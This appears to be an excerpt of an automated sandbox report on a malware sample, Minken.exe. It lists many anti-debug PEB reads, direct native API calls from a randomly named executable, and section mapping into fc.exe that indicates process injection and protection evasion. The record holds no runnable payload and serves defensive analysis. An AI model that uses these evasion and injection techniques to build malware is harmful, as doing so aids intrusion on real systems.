Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C700 mov eax, dword ptr fs:[00000030h]		12_2_2318C700
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]		12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]		12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]		12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]		12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318273C mov eax, dword ptr fs:[00000030h]		12_2_2318273C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318273C mov ecx, dword ptr fs:[00000030h]		12_2_2318273C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318273C mov eax, dword ptr fs:[00000030h]		12_2_2318273C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149730 mov eax, dword ptr fs:[00000030h]		12_2_23149730
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149730 mov eax, dword ptr fs:[00000030h]		12_2_23149730
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CC730 mov eax, dword ptr fs:[00000030h]		12_2_231CC730
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23185734 mov eax, dword ptr fs:[00000030h]		12_2_23185734
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315973A mov eax, dword ptr fs:[00000030h]		12_2_2315973A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315973A mov eax, dword ptr fs:[00000030h]		12_2_2315973A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23153720 mov eax, dword ptr fs:[00000030h]		12_2_23153720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316F720 mov eax, dword ptr fs:[00000030h]		12_2_2316F720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316F720 mov eax, dword ptr fs:[00000030h]		12_2_2316F720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316F720 mov eax, dword ptr fs:[00000030h]		12_2_2316F720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C720 mov eax, dword ptr fs:[00000030h]		12_2_2318C720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C720 mov eax, dword ptr fs:[00000030h]		12_2_2318C720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DE75D mov eax, dword ptr fs:[00000030h]		12_2_231DE75D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23150750 mov eax, dword ptr fs:[00000030h]		12_2_23150750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D4755 mov eax, dword ptr fs:[00000030h]		12_2_231D4755
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192750 mov eax, dword ptr fs:[00000030h]		12_2_23192750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192750 mov eax, dword ptr fs:[00000030h]		12_2_23192750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318674D mov esi, dword ptr fs:[00000030h]		12_2_2318674D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318674D mov eax, dword ptr fs:[00000030h]		12_2_2318674D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318674D mov eax, dword ptr fs:[00000030h]		12_2_2318674D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23163740 mov eax, dword ptr fs:[00000030h]		12_2_23163740
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23163740 mov eax, dword ptr fs:[00000030h]		12_2_23163740
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23163740 mov eax, dword ptr fs:[00000030h]		12_2_23163740
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23158770 mov eax, dword ptr fs:[00000030h]		12_2_23158770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23223749 mov eax, dword ptr fs:[00000030h]		12_2_23223749
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]		12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]		12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]		12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]		12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232237B6 mov eax, dword ptr fs:[00000030h]		12_2_232237B6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D7B0 mov eax, dword ptr fs:[00000030h]		12_2_2317D7B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F78A mov eax, dword ptr fs:[00000030h]		12_2_2320F78A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]		12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]		12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]		12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]		12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]		12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]		12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D97A9 mov eax, dword ptr fs:[00000030h]		12_2_231D97A9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231507AF mov eax, dword ptr fs:[00000030h]		12_2_231507AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315C7C0 mov eax, dword ptr fs:[00000030h]		12_2_2315C7C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231557C0 mov eax, dword ptr fs:[00000030h]		12_2_231557C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231557C0 mov eax, dword ptr fs:[00000030h]		12_2_231557C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231557C0 mov eax, dword ptr fs:[00000030h]		12_2_231557C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D07C3 mov eax, dword ptr fs:[00000030h]		12_2_231D07C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231547FB mov eax, dword ptr fs:[00000030h]		12_2_231547FB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231547FB mov eax, dword ptr fs:[00000030h]		12_2_231547FB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315D7E0 mov ecx, dword ptr fs:[00000030h]		12_2_2315D7E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231727ED mov eax, dword ptr fs:[00000030h]		12_2_231727ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231727ED mov eax, dword ptr fs:[00000030h]		12_2_231727ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231727ED mov eax, dword ptr fs:[00000030h]		12_2_231727ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DE7E1 mov eax, dword ptr fs:[00000030h]		12_2_231DE7E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192619 mov eax, dword ptr fs:[00000030h]		12_2_23192619
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23153616 mov eax, dword ptr fs:[00000030h]		12_2_23153616
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23153616 mov eax, dword ptr fs:[00000030h]		12_2_23153616
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225636 mov eax, dword ptr fs:[00000030h]		12_2_23225636
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE609 mov eax, dword ptr fs:[00000030h]		12_2_231CE609
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318F603 mov eax, dword ptr fs:[00000030h]		12_2_2318F603
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]		12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]		12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]		12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]		12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]		12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]		12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]		12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23181607 mov eax, dword ptr fs:[00000030h]		12_2_23181607
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E627 mov eax, dword ptr fs:[00000030h]		12_2_2316E627
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]		12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23186620 mov eax, dword ptr fs:[00000030h]		12_2_23186620
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23188620 mov eax, dword ptr fs:[00000030h]		12_2_23188620
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315262C mov eax, dword ptr fs:[00000030h]		12_2_2315262C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321866E mov eax, dword ptr fs:[00000030h]		12_2_2321866E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321866E mov eax, dword ptr fs:[00000030h]		12_2_2321866E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316C640 mov eax, dword ptr fs:[00000030h]		12_2_2316C640
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23182674 mov eax, dword ptr fs:[00000030h]		12_2_23182674
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A660 mov eax, dword ptr fs:[00000030h]		12_2_2318A660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A660 mov eax, dword ptr fs:[00000030h]		12_2_2318A660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23189660 mov eax, dword ptr fs:[00000030h]		12_2_23189660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23189660 mov eax, dword ptr fs:[00000030h]		12_2_23189660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154690 mov eax, dword ptr fs:[00000030h]		12_2_23154690
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154690 mov eax, dword ptr fs:[00000030h]		12_2_23154690
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]		12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]		12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]		12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]		12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231476B2 mov eax, dword ptr fs:[00000030h]		12_2_231476B2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231476B2 mov eax, dword ptr fs:[00000030h]		12_2_231476B2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231476B2 mov eax, dword ptr fs:[00000030h]		12_2_231476B2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231866B0 mov eax, dword ptr fs:[00000030h]		12_2_231866B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D6AA mov eax, dword ptr fs:[00000030h]		12_2_2314D6AA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D6AA mov eax, dword ptr fs:[00000030h]		12_2_2314D6AA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C6A6 mov eax, dword ptr fs:[00000030h]		12_2_2318C6A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320D6F0 mov eax, dword ptr fs:[00000030h]		12_2_2320D6F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]		12_2_2315B6C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]		12_2_2315B6C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]		12_2_2315B6C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]		12_2_2315B6C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateKey: Direct from: 0x76F02C6C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtSetInformationThread: Direct from: 0x76F02B4C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQuerySystemInformation: Direct from: 0x76F048CC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtOpenSection: Direct from: 0x76F02E0C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtSetInformationThread: Direct from: 0x76EF63F9			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateFile: Direct from: 0x76F02FEC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtOpenFile: Direct from: 0x76F02DCC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryInformationToken: Direct from: 0x76F02CAC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtTerminateThread: Direct from: 0x76F02FCC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtOpenKeyEx: Direct from: 0x76F02B9C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtSetInformationProcess: Direct from: 0x76F02C5C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateMutant: Direct from: 0x76F035CC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtMapViewOfSection: Direct from: 0x76F02D1C			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtResumeThread: Direct from: 0x76F036AC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtReadFile: Direct from: 0x76F02ADC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtDelayExecution: Direct from: 0x76F02DDC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryInformationProcess: Direct from: 0x76F02C26			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtResumeThread: Direct from: 0x76F02FBC			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateUserProcess: Direct from: 0x76F0371C			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: NULL target: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe protection: read write			Jump to behavior
